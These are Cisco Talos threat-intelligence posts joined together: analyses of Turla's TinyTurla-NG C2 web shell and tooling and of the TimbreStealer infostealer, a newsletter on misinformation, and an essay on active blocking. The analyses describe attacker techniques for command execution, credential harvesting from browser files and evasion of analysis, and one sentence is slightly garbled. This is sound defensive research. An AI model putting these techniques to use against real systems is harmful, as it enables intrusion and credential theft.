Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.
C2 server analysis
The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.
On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.
It will base64 decode the value of the $_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.
If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:
"task": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. Adversaries use this mechanism to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.
"gettask": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.
"result": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.
"getresult": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.
"file" + "name": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.
"cat_file": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.
"rm_file": Remove/delete a file specified by the requestor from the C2 server.
The HTTP form values accepted by the C2 server task, cat_file, rm_file, get_result and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, from a remote location, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.
This tactic can be visualized as:
Instrumenting TinyTurla-NG to carry out post-compromise activity
The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:
Reconnaissance commands: Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.
PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.
Copy file commands: Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\windows\temp\
Exfiltrationcommands/scripts aka TurlaPower-NG: These scripts were used to finally exfiltrate the selected files to the C2 servers.
The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.
While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:
Chisel: Modified copy of the Chisel client/agent.
Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.
Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.
The overall infection activity once TTNG has been deployed looks like this:
Using Chisel as another means of persistent access
Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\Windows\System32\TrustedWorker[.]exe
The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks
In the proxy:
“R”: Stands for remote port forwarding.
“5000”: This is the port on the attacker machine that receives the connection from the infected system.
“socks”: Specifies the usage of the SOCKS protocol.
(The default local host and port for a socks remote in Chisel is 127[.]0[.]0[.]1:1080.)
The C2 server that the chisel sample contacts is: 91[.]193[.]18[.]120:443.
The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named “dropher[.]com” and the subject name is “blum[.]com”.
During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or if they intended for the certificate to be used on another modified chisel implant.
The new certificate has the same issuer but in this case, the common name is blum[.]com and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.
Additional tools for elevated process execution and credential harvesting
Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.
The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd[.]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.
The second tool discovered by Talos is a PowerShell script residing at the location:
C:\windows\system32\edgeparser.ps1
This script is used to find login data from Microsoft Edge located at:
%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\windows\temp\<filename>.zip
The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:
%userprofile%\AppData\Local\Microsoft\Edge
TTNG uses the privilege elevation tool to run the PowerShell script using the command:
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
IOCs for this research can also be found in our GitHub repository here.
When we talk about the term “fake news,” most people likely picture a certain person who made the term infamous.
And when we talk about misinformation and disinformation, many will remember the “Russian troll farms” that popped up during the 2016 U.S. presidential election and were unmasked and shut down during former president Barack Obama’s final days in office.
But a few recent actions from TikTok, the most popular online social media platform, show that the problem of spreading misinformation and disinformation goes far beyond the borders of the U.S.
TikTok announced last week it was launching in-app “election centres” to help combat misinformation and inform users of facts when they view videos about elections in European Union nations. This includes 27 unique apps that all use the country’s native language.
In a statement on their site, the social media company said this effort is to “ensure people can easily separate fact from fiction.”
Part of me can’t help but wonder if this wasn’t a problem of the company’s own creation after they allowed misinformation about the COVID-19 global pandemic to spread rapidly and use an algorithm that enhances “controversial” videos about different international brands. But I can certainly hope that these election centres provide more context than the little info box Twitter launched a while ago.
I think this is important to note, though, that this problem just goes beyond American culture. Fake news, disinformation, misinformation – whatever label you want to put on it – will not just go away if one election in the U.S. goes one way or the other. It is an issue that is spreading on all platforms in all countries.
I’ve been at fault in the past for just wanting to put the blame on Twitter. While they have been one of the worst offenders of allowing misinformation on their site, they are far from the only offenders or the only platform where users can spread this time of misinformation, even if they are doing it by accident.
Just like any other platform, it’s easy for someone on TikTok to simply “share” or “like” someone else’s video if they find it compelling without giving it a second thought. Your friends and family are likely spreading misinformation on their feeds without even knowing it or doing it with any malicious intent. Regardless of where you live in the world, this is likely true.
It’s amplified in the U.S. because our political theater is such that when something happens, everyone else on the world stage notices it. I can’t say that folks in the U.S. are necessarily invested in the national elections in Greece.
But if misinformation is allowed to spread during the Greek elections, it’s going to spread to U.S. presidential elections. Once the infrastructure is in place for disinformation to flourish on a platform, it’s nearly impossible to get rid of, no matter the topic.
The one big thing
Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe. The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly observe new email distribution campaigns. We have observed all three malware families being delivered during the same timeframe from the same storage bucket within Google Cloud.
Why do I care?
Some of the highest volume campaigns recently observed were being used to deliver the Astaroth, Mekotio, and Ousaban banking trojans to victims largely located in Latin American countries. We have also observed lower volume campaign victims located throughout Europe and North America, which may indicate less geographically focused targeting by threat actors moving forward. For example, the current variant of Astaroth targets more than 300 institutions across 15 Latin American countries.
So now what?
Talos has released new ClamAV signatures and Snort rules to protect against these various banking trojans. Our researchers have also alerted Google of this activity so that they may address it internally on Cloud Run.
Top security headlines of the week
Poland is launching a formal investigation into whether its former government leaders misused the Pegasus spyware. Parliament created a coalition to see if the Law and Justice (PiS) government, previously the ruling party of Poland, used the controversial spyware to track and target its political opponents. Current ruling leaders used a promise of an investigation as one of their top campaign platforms. Meanwhile, NSO Group, the creators of Pegasus, have reportedly created a new one-click exploit called “MMS Fingerprint” that it offers as an infection tool for the spyware. MMS Fingerprint allows Pegasus users to learn a great deal about a target Blackberry, iPhone or Android device by sending a specially crafted Multimedia Messaging Service (MMS) message. A contract between an NSO Group reseller and a customer in Ghana exposed the information, including a promise that MMS Fingerprint required “No user interaction, engagement, or message opening ... to receive the device fingerprint.” (Politico, DarkReading)
The spyware startup Variston is reportedly shrinking and is preparing to completely close. Variston is known for launching spyware that can target iPhones, Android devices and some PCs. A disgruntled employee reportedly leaked information about the company and the zero-day exploits they used to Google’s Threat Analysis Group, which allowed Google to unmask the operation. This eventually led to several employees and developers leaving Variston. Variston, founded in 2018, previously used three zero-day vulnerabilities to target Apple devices, including a campaign in March 2023 to target iPhones in Indonesia. Reporters and researchers have yet to find who, exactly, Variston sold their services and technology to, though former employees have said some of the spyware was sent to the United Arab Emirates. (Tech Crunch, Google)
Volt Typhoon, a large APT based in China, is reportedly still exfiltrating sensitive information on operational technology (OT) networks. Volt Typhoon has been known to target organizations in the communications, manufacturing, utility, IT and education sectors across the globe, though it’s recently become more noteworthy for its targeting of critical networks in the U.S. A new report from cybersecurity firm Dragos says that it spotted Volt Typhoon conducting scanning activities against electric companies between November and December 2023. Volt Typhoon is traditionally known for espionage and data theft on behalf of the Chinese government. But Dragos also says that the actor has also recently infiltrated a large U.S. city's emergency services network, as well as critical infrastructure networks in Africa. The report states that the OT data stolen may cause “unintended disruption to critical industrial processes or provide the adversary with crucial intelligence to aid in follow-up offensive tool development or attacks against ICS networks.” (SecurityWeek, The Register)
To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine.
Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.”
This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
TimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.
It contains several embedded modules used for orchestration, decryption and protection of the malware binary.
Talos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023. This campaign uses phishing emails with financial themes, directing users to a compromised website where the payload is hosted and tricking them into executing the malicious application.
Talos has observed new distribution campaigns being conducted by this threat actor since at least September 2023, when they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers before changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we haven’t found any evidence of Mispadu being used anymore.
The phishing campaign uses geofencing techniques to only target users in Mexico, and any attempt to contact the payload sites from other locations will return a blank PDF file instead of the malicious file. The current spam run was observed to mainly use Mexico's digital tax receipt standard called CDFI (which stands for “Comprobante Fiscal Digital por Internet,” or online fiscal digital invoice in English). Talos has also observed emails using generic invoice themes used for the same campaign.
Although we could not find hard evidence linking the two campaigns, we assess with high confidence they are operated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity distributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more evidence of Mispadu being used.
TimbreStealer, a new obfuscated information stealer
Talos has identified a new family of information stealers while investigating a spam campaign targeting Mexican users starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam campaign which we will analyze later.
TimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution, and ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass conventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit process, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the authors are skilled and have developed these components in-house.
The sample we’re analyzing was found on a victim machine following a visit to a compromised website after the users clicked on a link present in a spam email.
Our analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption process involving a main orchestration DLL and a global decryption key which is used throughout the different modules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the initial modules and their relationship.
TimbreStealer’s Decryption Process
This first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first scan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this point will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from 32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued.
Once this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has its MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now launches the DLL passing the Zw* hash table as an argument to its exported function.
Decryption of all submodules makes use of a global decryption key. As the execution of the malware progresses, this key is encrypted over and over again. If execution does not follow every step of the expected path, the decryption key will get out of sync and all subsequent decryptions will fail.
This prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments to access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption rounds on the global key are scattered about in the code and even occur from within the different sub-modules themselves.
All stages of this malware use the same coding style and techniques. We therefore assess with high confidence that all obfuscation layers and final payload were developed by the same authors.
TimbreStealer’s embedded modules
Once the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s being executed in a sandbox environment. It will also extract the many submodules embedded in the payload. Talos identified at least three different layers after the main payload was extracted, with several modules in each layer used for different functions:
The second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest and extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first checks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin American region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to ensure it is not running in a sandbox environment.
At this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of previous infection, and scan the system browsers for signs of natural use. The files and registry keys checked by the malware include the non-exhaustive list below:
The presence of these keys along with other checks mentioned before will prevent the execution of the remaining stages of the malware.
The orchestrator contains four other encrypted sub-modules within it.
IDX
Size
CRC32
Purpose
0
8kb
0xF25BEB22
Shellcode loader for stripped DLLs
1
100kb
0xEB4CD3EC
DLL - not analyzed yet
2
60kb
0xFA4AA96B
DLL - Anti-vm and anti-analysis, system of interest checks
3
3.92mb
0xAB029A74
DLL - Installer with encrypted payload
All blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and can optionally decompress the raw data if specified. This overall architecture has been observed in all layers.
Each stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred to this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.
Submodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on the global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer include:
VMWare hook and port checks.
Vpcext, IceBP, int 2D instructions to detect debuggers.
If all of these checks complete as expected, then the final module can be decrypted successfully.
Submodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy document will also be displayed to help defer suspicion.
Execution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses Microsoft’s reg.exe to add a run once registry key, and then trigger rundll32.exe to process this entry through the system iernonce.dll.
Under certain conditions, this layer can also modify Group Policy options to set startup scripts.
TimbreStealer’s Installed DLL modules
The installed DLL named Cecujujajofubo475.dll uses the same overall architecture as the first DLL detailed above, with all of its internal strings encrypted, uses a global decrypt buffer, and uses a different Zw* API hash table to perform direct syscalls avoiding user API.
In this layer there are also TLS callbacks to add complexity to global decrypt buffer encryption. An extra round of encryption has also been added that depends on the parent process name and value within the registry key given above to prevent analysis on 3rd party machines.
This DLL contains eight encrypted sub-modules within it:
IDX
Size
CRC32
Purpose
0
0x1000
0x2B80E901
Single XOR function accepting 5 arguments
1
0x1000
0x520200E8
x64 shellcode PE loader
2
0x2000
0x105542F7
x86 shellcode PE loader
3
0x2000
0xC4ECE0A8
Unknown shellcode
4
0x7600
0xC1384E15
Unknown module, seems to be used to decompress other blobs
5
0xD800*
0x1D38B250
Anti-VM/Sandbox layer
6
0x1B600*
0x4F1FEFE3
x86 DLL to extract main payload
7
0x1EE00*
0xF527AC18
x64 DLL to extract main payload
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
While this DLL contains many of the same protections found in the installation phase, several more have been identified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for Windows data collection.
Another interesting protection overwrites all of the loaded DLLstwo-stagein the process with clean copies from the that disk. This will wipe all Antivirus vendor user mode hooks, software breakpoints, and user patches during execution.
This DLL serves as a loader for the final payload which is housed within the ApplicationIcon.ico file shown in the previous relationship diagram. Submodule No. 7 will be the default loader that Submodule attempts to launch. They attempt to inject this 64-bit DLL into a preferred list of svchost.exe processes.
The order of preference is based on svchost.exe process command line, looking for the following strings:
DcomLaunch
Power
BrokerInfrastructure
LSM
Schedule
If the injections into svchost.exe fail, then a backup 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using syscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the shellcode are also executed through the syscall mechanism set up earlier.
The first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL from the ApplicationIcon.ico file. The 32 bit version will again use a custom PE loader to directly load and run the final payload DLL within its own process after extraction.
TimbreStealer’s Final Payload Module
The architecture of this layer is the same as all of the previous and contains an additional nine sub-modules. Analysis of this final payload module and submodules is still ongoing at the time of writing:
IDX
Size
CRC32
Purpose
0
0x1000
0x2B80E901
Single XOR function accepting 5 arguments. Matches the previous layer blob #0
1
0x1000
0x520200E8
x64 shellcode PE loader. Matches the previous layer blob #1
2
0x2000
0x105542F7
x86 shellcode PE loader. Matches the previous layer blob #2
3
0x2000
0xC4ECE0A8
Unknown shellcode. Matches the previous layer blob #3
4
0xA5000*
0xB0214A74
Not yet analyzed
5
0x13CC00*
0xE8421ADE
Not yet analyzed
6
0x16800*
0xD30A298E
Not yet analyzed
14
0x16600*
0x55BFB99
Not yet analyzed
15
0x7C800*
0x2F6F928D
Not yet analyzed
(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.
The following is a preliminary analysis of the malware features based on the strings we were able to decrypt from this module. They indicate the malware can collect a variety of information from the machine and post data to an external website, which is typical behavior of an information stealer.
Collect credential information from the victim’s machine
The following strings were found in functions scanning files and directories. This module also embeds the SQLite library to handle different browsers' credential storage files.
The malware also scans several directories looking for files although it’s not clear yet for what purpose. We can see in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders.
Another set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd” which are related to MacOS.
$360Section
$AV_ASW
$GetCurrent
$Recycle.Bin
$SysReset
$WinREAgent
.fseventsd
.Spotlight-V100
AdwCleaner
AMD
Autodesk
boot
Brother
Config.Msi
Documents and Settings
EFI
Hewlett-Packard
inetpub
Intel
MSOCache
PerfLogs
Program Files
Program Files (x86)
ProgramData
Recovery
RecoveryImage
Resources
SWSetup
System Volume Information
SYSTEM.SAV
~MSSETUP.T
$WINDOWS.
AutoKMS
KMSAuto
Users
AppData\\Local
AppData\\Roaming
Desktop
Documents
Downloads
OneDrive
Dropbox
Collect OS information
TimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a wealth of information about the machine where it’s running.
OS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate, InstallTime
SMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion, SerialNumber, Vendor, Version
The code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not associated with any known file type. This may be indicative of a file that is created by the malware itself.
The strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to capture network packets, which may be indicative that the malware can do network sniffing.
npf
npcap
npcap_wifi
www.google.com
amazon.com
dropbox.com
linkedin.com
twitter.com
wikipedia.org
facebook.com
login.live.com
apple.com
www.paypal.com
Disable System Protections
The malware executes calls to a function used to remove System Restore points on the machine. This is a typical behavior of Ransomware malware although Talos have not observed any Ransomware activity on infected victims. Additional analysis is still needed in order to confirm or discard this hypothesis.
The malware attempts to access services and Mutex used by Remote Desktop servers. It’s not clear yet how this is used in the payload code.
console
TermService
Global\\TermSrvReadyEvent
winlogon.exe
console
POST data to remote site
A list of URLs along with strings used in HTTP communication was found in functions accessing the network. These URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe these to be the command and control servers used by the malware, but so far, the samples we analyzed have not communicated back to any of them.
These strings are just a small piece of this puzzle, and more analysis is required on the final payload and its embedded modules to understand their exact purpose.
Previous Mispadu spam campaign
Activity associated with these current distribution campaigns was first observed in September 2023 when the threat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised websites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an externally hosted file upon the victim double clicking on it.
Both URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via WebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:
During the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in Mexico.
The .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro Federal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file names also typically contained 6 random digits.
The Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have seen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two parameters “f” and “w”:
We observed this campaign to be active until the middle of November, at which time a new payload with TimbreStealer was dropped on the victim's computers from the compromised website.
The target industries of this campaign is spread around different verticals with a slight focus on manufacturing and transportation as we can see below:
Spam campaign using CDFI as lure
Talos detected a low-volume campaign using CDFI to lure users to download and execute a malicious file disguised as a PDF document starting around the middle of November and still ongoing as of February 2024. CDFI is a mandatory electronic invoice standard used in Mexico for purposes of Tax reporting. In this campaign, a spam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.
The Subjects we observed in this campaign follow the same theme:
Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288
The website uses Javascript to detect characteristics of the user such as geolocation and browser type and then initiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer dropper using WebDAV. The Zip file is usually named following the same theme:
CFDI_930209.zip
FACTURA_560208.zip
In case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.
All the URLs for this current campaign follow a similar format:
Where <token> above is one of the following strings: “cfdi”, “factura”, “timbreDigital”, “facdigital” or “seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by two numbers.
The .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult, yet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:
User interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to execute, at which point the TimbreStealer main infection will start.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 63057 - 63072 and 300840 - 300844.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
Win.Infostealer.TimbreStealer-10021027-0
Win.Infostealer.TimbreStealer-10021026-0
Win.Infostealer.Generic-10017202-0
Win.Packed.Generic-10019162-0
Win.Dropper.Generic-10017203-0
Indicators of Compromise
IOCs for this research can be found in our GitHub repository here.
As we begin a new year, we wanted to address one of the biggest issues we consistently see in our investigations: passive security.
Incident response engagements are an important part of our work and the intelligence-gathering process and their associated reports can be a treasure trove of tactics, techniques and procedures (TTPs) for adversaries, but also expose common gaps and mistakes organizations make.
When we're fighting state-sponsored groups and cartels with millions in revenue to support their attacks, trying to win with passive security isn't a good strategy. One of the most common findings from Cisco Talos Incident Response engagements involves some variation of the technology in place and it detected the activity, yet the actor(s) successfully compromised the organization. The reason almost without fail is that the product wasn't running in blocking mode, something easily prevented with an active approach.
This fight between enterprises and threat actors isn't new – we've been going back and forth for decades, if not longer. As long as we've had security technology that actively blocks, there have been employees and leaders arguing that it shouldn't. Maybe 10 or 15 years ago they could have had an argument, as emerging technology can produce a lot of false-positives, but in today's threat landscape, it's asking for trouble.
Passive detection has its place in specific circumstances where active blocking either isn't possible or feasible; the issue comes when organizations run the majority, if not all, of their security technologies in passive mode, most critically on the endpoint. These last bastions of detection are invaluable for identifying attacks that were successful in evading and actively blocking security technologies that may be deployed to prevent compromise.
Adversaries' sophistication continues to improve
Historically, the threats organizations had to deal with were rarely targeted and primarily the work of miscreants trying to install a bot or some other simple malicious payload. Today, if you are lucky, you are only fighting against scores of affiliates using every technique and vulnerability under the sun to try and compromise the organization with severe impacts, resulting in potentially millions of dollars in ransom or extortion payments as well as collateral brand and reputation damage. In even worse scenarios, enterprises are also facing off against state-sponsored groups with deep funding and associated sophistication and the potential links between them.
These adversaries are sophisticated but they aren't perfect. They still need to run commands and potentially execute tooling to complete their compromise. Commonly, these commands and tools are detected, but if they aren't blocked, it’s not likely to slow the adversary down. What is the point of spending, in some cases, millions of dollars on technology to protect your environment only to have an alert generated at 3 a.m., when no one was looking, as the adversary was gathering and exfiltrating your most valuable secrets? This is especially true for endpoint security, as this is the last bastion of protection an organization has and as the final line of defense it needs to be impactful.
Threat actors are getting more efficient at their goals of data gathering, exfiltration and ransoming. During our research into Truebot, we identified a tool called “teleport” designed to make data exfiltration faster and more covert. This allowed actors to quickly execute commands to gather and exfiltrate potentially interesting data for extortion purposes.
This is just the latest example in a long line of evidence pointing to sophistication and structure. Others include leaked playbooks for how to work through a network quickly and efficiently. These affiliates are good at what they do, and not actively blocking their activity is a mistake.
Skills shortage is real and getting worse
There might be an argument to be made that if you are running a 24/7/365 security operations team then running in passive mode should be sufficient since they can be actioned by analysts. In reality, the limited security team is at capacity just keeping the technology they have updated, running and reporting. While simultaneously having to manage the expectations and demands of leadership on the latest vulnerability or threat that is making headlines. Combine that with the need to meet all compliance requirements for the business and you're already over-extended. This leaves little time for analysts to triage alerts as they are generated. More often than not, an alert is sent to a console with no one looking, and as the saying goes, “If a tree falls in the woods and no one is there to hear it, does it make a sound?”
Likewise generating alerts without taking action doesn't protect the organization, it just sends up a flare that something could be wrong. In the end, you're left with an incident response report that shows the right technology was deployed in the right places and it did its job, but the adversaries were still successful.
Parallels to enterprise patching progress
There is another issue in security or more generally in IT that has some parallels to active security: patching. Looking back five to 10 years, patching was either not being done at all or was required to be "baked in" for three to six months on test systems to ensure it didn't cause any issues or crashes. Flash forward to today and patches have become so stable that organizations roll them out with regularity without issue and home users commonly have patches automatically applied. The same is true for active security today. False-positives can still happen, but the risk continues to diminish as the threats grow exponentially.
Do you want false positives or true breaches?
